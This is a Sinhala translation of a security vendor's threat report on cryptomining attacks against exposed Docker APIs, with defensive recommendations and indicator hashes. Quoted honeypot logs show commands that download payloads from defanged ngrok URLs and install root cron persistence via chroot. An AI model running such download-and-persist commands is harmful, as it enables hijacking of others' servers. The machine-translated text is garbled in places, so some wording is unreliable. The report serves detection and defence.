තර්ජන හඹා යෑම සඳහා අප විසින් නිර්මාණය කරන ලද හනිපොට් බහාලුම් භාවිතයෙන් එකතු කරන ලද දත්ත අපි විශ්ලේෂණය කළෙමු. තවද අපි Docker Hub හි ප්රජා-ප්රකාශිත රූපයක් භාවිතයෙන් හොර බහාලුම් ලෙස යොදවා ඇති අනවශ්ය හෝ අනවසර ගුප්ත ව්යවහාර මුදල් පතල්කරුවන්ගෙන් සැලකිය යුතු ක්රියාකාරකම් අනාවරණය කර ගත්තෙමු. රූපය අනිෂ්ට cryptocurrency පතල්කරුවන් ලබා දෙන සේවාවක කොටසක් ලෙස භාවිතා වේ.
මීට අමතරව, විවෘත අසල්වැසි බහාලුම් සහ යෙදුම් වලට විනිවිද යාමට ජාල සමඟ වැඩ කිරීම සඳහා වැඩසටහන් ස්ථාපනය කර ඇත.
අපි අපගේ Honeypots එලෙසම තබමු, එනම් පෙරනිමි සැකසුම් සමඟ, කිසිදු ආරක්ෂක පියවරක් හෝ පසුව අමතර මෘදුකාංග ස්ථාපනය නොකරමු. දෝෂ සහ සරල දුර්වලතා මඟහරවා ගැනීම සඳහා මූලික සැකසුම සඳහා Docker සතුව නිර්දේශ ඇති බව කරුණාවෙන් සලකන්න. නමුත් භාවිතා කරන Honeypots බහාලුම් වේ, බහාලුම් වේදිකාවට එල්ල කරන ප්රහාර හඳුනා ගැනීමට නිර්මාණය කර ඇත, බහාලුම් තුළ ඇති යෙදුම් නොවේ.
අනාවරණය කරගත් ද්වේශසහගත ක්රියාකාරකම ද සැලකිය යුතු වන්නේ එයට දුර්වලතා අවශ්ය නොවන නිසා සහ ඩොකර් අනුවාදයෙන් ස්වාධීන වන බැවිනි. වැරදි ලෙස වින්යාස කර ඇති සහ එම නිසා විවෘත බහාලුම් රූපයක් සොයා ගැනීම ප්රහාරකයන්ට බොහෝ විවෘත සේවාදායකයන් ආසාදනය කිරීමට අවශ්ය වේ.
වසා නොගත් Docker API මඟින් පරිශීලකයාට පුළුල් පරාසයක ක්රියා කිරීමට ඉඩ සලසයි , ධාවනය වන බහාලුම් ලැයිස්තුවක් ලබා ගැනීම, නිශ්චිත බහාලුමකින් ලඝු-සටහන් ලබා ගැනීම, ආරම්භ කිරීම, නැවැත්වීම (බලහත්කාරයෙන් ඇතුළුව) සහ නිශ්චිත සැකසුම් සහිත නිශ්චිත රූපයකින් නව බහාලුමක් නිර්මාණය කිරීම ඇතුළුව.
වම් පසින් ඇත්තේ අනිෂ්ට මෘදුකාංග බෙදා හැරීමේ ක්රමයයි. දකුණු පසින් ප්රහාරකයාගේ පරිසරය ඇත, එමඟින් පින්තූර දුරස්ථව පෙරළීමට ඉඩ සලසයි.
විවෘත Docker API 3762 රට අනුව බෙදා හැරීම. 12.02.2019/XNUMX/XNUMX දිනැති ෂෝඩාන් සෙවීම මත පදනම්ව
ප්රහාර දාම සහ ගෙවීමේ විකල්ප
ද්වේෂසහගත ක්රියාකාරකම් අනාවරණය කර ගත්තේ හනිපොට් ආධාරයෙන් පමණක් නොවේ. Monero cryptocurrency පතල් මෘදුකාංග යෙදවීමට පාලමක් ලෙස වැරදි ලෙස වින්යාස කළ බහාලුමක් විමර්ශනය කිරීමෙන් පසු නිරාවරණය වූ Docker API ගණන (දෙවන ප්රස්ථාරය බලන්න) වැඩි වී ඇති බව Shodan වෙතින් දත්ත පෙන්නුම් කරයි. පසුගිය වසරේ ඔක්තෝම්බර් මාසයේදී (2018, වත්මන් දත්ත ආසන්න වශයෙන් පරිවර්තකයා) විවෘත API 856 ක් පමණි.
හනිපොට් ලඝු පරීක්ෂාවකින් පෙනී ගියේ බහාලුම් රූප භාවිතය ද භාවිතය සමඟ සම්බන්ධ වී ඇති බවයි , ආරක්ෂිත සම්බන්ධතා ස්ථාපිත කිරීම හෝ පොදු ප්රවේශ විය හැකි ස්ථාන වලින් නිශ්චිත ලිපින හෝ සම්පත් වෙත ගමනාගමනය යොමු කිරීම සඳහා මෙවලමක් (උදාහරණයක් ලෙස localhost). මෙමගින් ප්රහාරකයන්ට විවෘත සේවාදායකයකට ගෙවීම් භාරදෙන විට ගතිකව URL නිර්මාණය කිරීමට ඉඩ සලසයි. ngrok සේවාව අනිසි ලෙස භාවිතා කරන බව පෙන්වන ලඝු-සටහන් වලින් කේත උදාහරණ පහත දැක්වේ:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”ඔබට පෙනෙන පරිදි, උඩුගත කරන ලද ගොනු නිරන්තරයෙන් වෙනස් වන URL වලින් බාගත කර ඇත. මෙම URL වල කෙටි කල් ඉකුත් වීමේ දිනයක් ඇත, එබැවින් කල් ඉකුත් වූ දිනට පසුව ගෙවීම් බාගත කළ නොහැක.
ගෙවීමේ විකල්ප දෙකක් තිබේ. පළමුවැන්න Linux සඳහා සම්පාදනය කරන ලද ELF miner (Coinminer.SH.MALXMR.ATNO ලෙස අර්ථ දක්වා ඇත) එය පතල් තටාකයට සම්බන්ධ කරයි. දෙවැන්න ජාල පරාසයන් පරිලෝකනය කිරීමට සහ නව ඉලක්ක සෙවීමට භාවිතා කරන ඇතැම් ජාල මෙවලම් ලබා ගැනීමට නිර්මාණය කර ඇති ස්ක්රිප්ට් (TrojanSpy.SH.ZNETMAP.A) වේ.
ඩ්රොපර් ස්ක්රිප්ට් විචල්ය දෙකක් සකසයි, පසුව ඒවා ගුප්තකේතන මුදල් පතල්කරු යෙදවීමට භාවිතා කරයි. HOST විචල්යයේ අනිෂ්ට ගොනු ඇති URL අඩංගු වන අතර RIP විචල්යය යනු යෙදවිය යුතු පතල්කරුගේ ගොනු නාමය (ඇත්ත වශයෙන්ම, හැෂ්) වේ. හැෂ් විචල්යය වෙනස් වන සෑම අවස්ථාවකම HOST විචල්යය වෙනස් වේ. ප්රහාරයට ලක් වූ සේවාදායකයේ වෙනත් කිසිදු cryptocurrency පතල්කරුවන් ක්රියාත්මක නොවන බව පරීක්ෂා කිරීමට ස්ක්රිප්ට් උත්සාහ කරයි.
HOST සහ RIP විචල්යවල උදාහරණ මෙන්ම වෙනත් පතල් කම්කරුවන් ක්රියාත්මක නොවන බව පරීක්ෂා කිරීමට භාවිතා කරන කේත කොටසකි.
පතල් කම්කරුවා ආරම්භ කිරීමට පෙර, එය nginx ලෙස නම් කර ඇත. මෙම ස්ක්රිප්ටයේ අනෙකුත් අනුවාද මගින් පතල් කම්කරුවා ලිනක්ස් පරිසරයන්හි පවතින වෙනත් නීත්යානුකූල සේවාවන් වෙත නැවත නම් කරයි. ධාවන ක්රියාවලි ලැයිස්තුවට එරෙහිව චෙක්පත් මඟ හැරීමට මෙය සාමාන්යයෙන් ප්රමාණවත් වේ.
සෙවුම් පිටපතෙහි විශේෂාංග ද ඇත. අවශ්ය මෙවලම් යෙදවීමට එය එකම URL සේවාව සමඟ ක්රියා කරයි. ඒවා අතර zmap ද්විමය වන අතර එය ජාල පරිලෝකනය කිරීමට සහ විවෘත වරායන් ලැයිස්තුවක් ලබා ගැනීමට භාවිතා කරයි. සොයාගත් සේවා සමඟ අන්තර් ක්රියා කිරීමට සහ සොයාගත් සේවාව පිළිබඳ අමතර තොරතුරු තීරණය කිරීමට (උදාහරණයක් ලෙස, එහි අනුවාදය) ඔවුන්ගෙන් බැනර් ලබා ගැනීමට භාවිතා කරන තවත් ද්විමයයක් ස්ක්රිප්ට් පූරණය කරයි.
ස්කෑන් කිරීම සඳහා ස්ක්රිප්ට් සමහර ජාල පරාසයන් පූර්ව-නිර්ණය කරයි, නමුත් මෙය ස්ක්රිප්ට් අනුවාදය මත රඳා පවතී. එය ස්කෑන් කිරීම ක්රියාත්මක කිරීමට පෙර සේවා වෙතින් ඉලක්ක වරායන් ද සකසයි - මෙම අවස්ථාවේදී, ඩොකර් -.
හැකි ඉලක්ක සොයාගත් විගස, බැනර් ස්වයංක්රීයව ඒවායින් ඉවත් කරනු ලැබේ. ස්ක්රිප්ටය සේවා, යෙදුම්, සංරචක හෝ උනන්දුවක් දක්වන වේදිකා මත පදනම්ව ඉලක්ක පෙරහන් කරයි: Redis, Jenkins, Drupal, MODX, , Docker 1.16 සේවාදායකයා සහ Apache CouchDB. ස්කෑන් කරන ලද සේවාදායකය ඒවායින් එකකට ගැලපෙන්නේ නම්, එය පෙළ ගොනුවක සුරකිනු ඇත, ප්රහාරකයන්ට පසුව විශ්ලේෂණය සහ අනවසරයෙන් ඇතුළුවීම සඳහා එය භාවිතා කළ හැකිය. මෙම පෙළ ගොනු ගතික සබැඳි හරහා ප්රහාරකයන්ගේ සේවාදායක වෙත උඩුගත කෙරේ. එනම්, එක් එක් ගොනුව සඳහා වෙනම URL එකක් භාවිතා කරයි, එයින් අදහස් වන්නේ පසුව ප්රවේශය අපහසු බවයි.
ප්රහාරක දෛශිකය යනු ඩොකර් රූපයක් වන අතර එය ඊළඟ කේත කොටස් දෙකෙහි දැකිය හැකිය.
ඉහළින් නීත්යානුකූල සේවාවක් ලෙස නැවත නම් කරන අතර පහළින් ජාල පරිලෝකනය කිරීමට zmap භාවිතා කරන ආකාරය ඇත.
ඉහළින් පූර්ව නිශ්චිත ජාල පරාසයන් ඇත, පහළින් ඩොකර් ඇතුළු සේවා සෙවීම සඳහා විශේෂිත වරායන් ඇත.
ඇල්පයින්-කර්ල් රූපය මිලියන 10 කට වඩා වැඩි වාර ගණනක් බාගත කර ඇති බව තිර රුව පෙන්වයි
විවිධ ප්රොටෝකෝල හරහා ගොනු මාරු කිරීම සඳහා සම්පත්-කාර්යක්ෂම CLI මෙවලමක් වන Alpine Linux සහ curl මත පදනම්ව, ඔබට ගොඩනගා ගත හැකිය. . ඔබට පෙර රූපයේ පෙනෙන පරිදි, මෙම පින්තූරය දැනටමත් මිලියන 10 කට වඩා වැඩි වාර ගණනක් බාගත කර ඇත. බාගැනීම් විශාල සංඛ්යාවක් මෙම රූපය ඇතුල් වීමේ ලක්ෂ්යයක් ලෙස භාවිතා කිරීම අදහස් විය හැක; මෙම රූපය මාස හයකට වඩා වැඩි කාලයකට පෙර යාවත්කාලීන කරන ලදී; පරිශීලකයින් මෙම ගබඩාවෙන් වෙනත් පින්තූර නිතර බාගත කර නැත. Docker හි - කන්ටේනරයක් ක්රියාත්මක කිරීම සඳහා වින්යාස කිරීමට භාවිතා කරන උපදෙස් මාලාවක්. ඇතුල්වීමේ ස්ථාන සැකසුම් වැරදියි (උදාහරණයක් ලෙස, කන්ටේනරය අන්තර්ජාලයෙන් විවෘතව තබා ඇත), රූපය ප්රහාරක දෛශිකයක් ලෙස භාවිතා කළ හැක. ප්රහාරකයන්ට වැරදි ලෙස වින්යාස කර ඇති හෝ විවෘත බහාලුමක් සහය නොදක්වා ඇති බව දුටුවහොත් එය ගෙවීමට එය භාවිතා කළ හැක.
මෙම රූපය (ඇල්පයින්-කර්ල්) අනිෂ්ට නොවන බව සැලකිල්ලට ගැනීම වැදගත්ය, නමුත් ඔබට ඉහත දැකිය හැකි පරිදි, එය අනිෂ්ට කාර්යයන් සිදු කිරීමට භාවිතා කළ හැකිය. සමාන ඩොකර් පින්තූර අනිෂ්ට ක්රියාකාරකම් සිදු කිරීමට ද භාවිතා කළ හැක. අපි ඩොකර් අමතා ඔවුන් සමඟ මෙම ගැටලුව සම්බන්ධයෙන් කටයුතු කළෙමු.
නිර්දේශ
දේහය බොහෝ සමාගම් සඳහා, විශේෂයෙන්ම ක්රියාත්මක කරන අය සඳහා , වේගවත් සංවර්ධනය සහ බෙදා හැරීම කෙරෙහි අවධානය යොමු කර ඇත. විගණන සහ අධීක්ෂණ නීතිරීතිවලට අනුකූල වීමේ අවශ්යතාවය, දත්ත රහස්යභාවය අධීක්ෂණය කිරීමේ අවශ්යතාවය මෙන්ම ඒවායේ නොගැලපීම නිසා සිදුවන විශාල හානිය නිසා සෑම දෙයක්ම උග්ර වේ. සංවර්ධන ජීවන චක්රය තුළට ආරක්ෂක ස්වයංක්රීයකරණය ඇතුළත් කිරීම ඔබට වෙනත් ආකාරයකින් අනාවරණය කර නොගත හැකි ආරක්ෂක සිදුරු සොයා ගැනීමට උපකාරී වනවා පමණක් නොව, එක් එක් සොයාගත් අවදානම් සඳහා අමතර මෘදුකාංග ගොඩනැගීම් ධාවනය කිරීම හෝ යෙදුමක් යෙදවීමෙන් පසු වැරදි ලෙස වින්යාස කිරීම වැනි අනවශ්ය වැඩ බර අඩු කිරීමට ද එය උපකාරී වේ.
මෙම ලිපියේ සාකච්ඡා කරන ලද සිදුවීම පහත සඳහන් නිර්දේශ ඇතුළුව ආරම්භයේ සිටම ආරක්ෂාව සැලකිල්ලට ගැනීමේ අවශ්යතාවය ඉස්මතු කරයි:
- පද්ධති පරිපාලකයින් සහ සංවර්ධකයින් සඳහා: සෑම දෙයක්ම නිශ්චිත සේවාදායකයකින් හෝ අභ්යන්තර ජාලයකින් ඉල්ලීම් පිළිගැනීමට පමණක් වින්යාස කර ඇති බව සහතික කර ගැනීමට ඔබේ API සැකසීම් නිතරම පරීක්ෂා කරන්න.
- අවම අයිතිවාසිකම් මූලධර්මය අනුගමනය කරන්න: බහාලුම් රූප අත්සන් කර සත්යාපනය කර ඇති බවට සහතික වන්න, තීරණාත්මක සංරචක වෙත ප්රවේශය සීමා කරන්න (බහාලුම් දියත් කිරීමේ සේවාව) සහ ජාල සම්බන්ධතා වෙත සංකේතනය එක් කරන්න.
- අනුගමනය කරන්න සහ ආරක්ෂක යාන්ත්රණ සක්රීය කරන්න, උදා. සහ ඉදි කර ඇත .
- කන්ටේනරය තුළ ක්රියාත්මක වන ක්රියාවලීන් පිළිබඳ අමතර තොරතුරු ලබා ගැනීමට ධාවන කාල සහ රූප ස්වයංක්රීයව පරිලෝකනය කිරීම භාවිතා කරන්න (උදාහරණයක් ලෙස, වංචා කිරීම හඳුනා ගැනීමට හෝ අවදානම් සෙවීමට). යෙදුම් පාලනය සහ අඛණ්ඩතාව අධීක්ෂණය සේවාදායක, ගොනු සහ පද්ධති ප්රදේශවල අසාමාන්ය වෙනස්කම් නිරීක්ෂණය කිරීමට උපකාරී වේ.
Trendmicro DevOps කණ්ඩායම්වලට ආරක්ෂිතව ගොඩනඟා ගැනීමට, ඉක්මනින් ඉදිරියට යාමට සහ ඕනෑම තැනක දියත් කිරීමට උදවු කරයි. Trend Micro සංවිධානයක DevOps නල මාර්ගය හරහා බලවත්, විධිමත් සහ ස්වයංක්රීය ආරක්ෂාව සපයන අතර බහුවිධ තර්ජන ආරක්ෂණයන් සපයයි ධාවන වේලාවේදී භෞතික, අතථ්ය සහ වලාකුළු වැඩ බර ආරක්ෂා කිරීමට. එය සමඟ බහාලුම් ආරක්ෂාව ද එක් කරයි и , ඒවා යෙදවීමට පෙර තර්ජන වැළැක්වීම සඳහා සංවර්ධන නල මාර්ගයේ ඕනෑම ස්ථානයක අනිෂ්ට මෘදුකාංග සහ අවදානම් සඳහා ඩොකර් බහාලුම් රූප පරිලෝකනය කරයි.
සම්මුතියේ සලකුණු
අදාළ හැෂ්:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
මත සම්භාවිතාව අවම කිරීම සඳහා හෝ ඉහත විස්තර කර ඇති තත්වය සම්පූර්ණයෙන්ම වළක්වා ගැනීම සඳහා ප්රථමයෙන් කළ යුතු සැකසුම් මොනවාදැයි පුහුණු කරන කථිකයන් පෙන්වයි. සහ අගෝස්තු 19-21 දිනවල ඔන්ලයින් තීව්රතාවයකදී ඔබට මෙම සහ ඒ හා සමාන ආරක්ෂක ගැටළු සගයන් සහ පුහුණු ගුරුවරුන් සමඟ වට මේසයක සාකච්ඡා කළ හැකිය, එහිදී සෑම කෙනෙකුටම කතා කිරීමට සහ පළපුරුදු සගයන්ගේ වේදනාවන් සහ සාර්ථකත්වයට සවන් දීමට හැකිය.
මූලාශ්රය: www.habr.com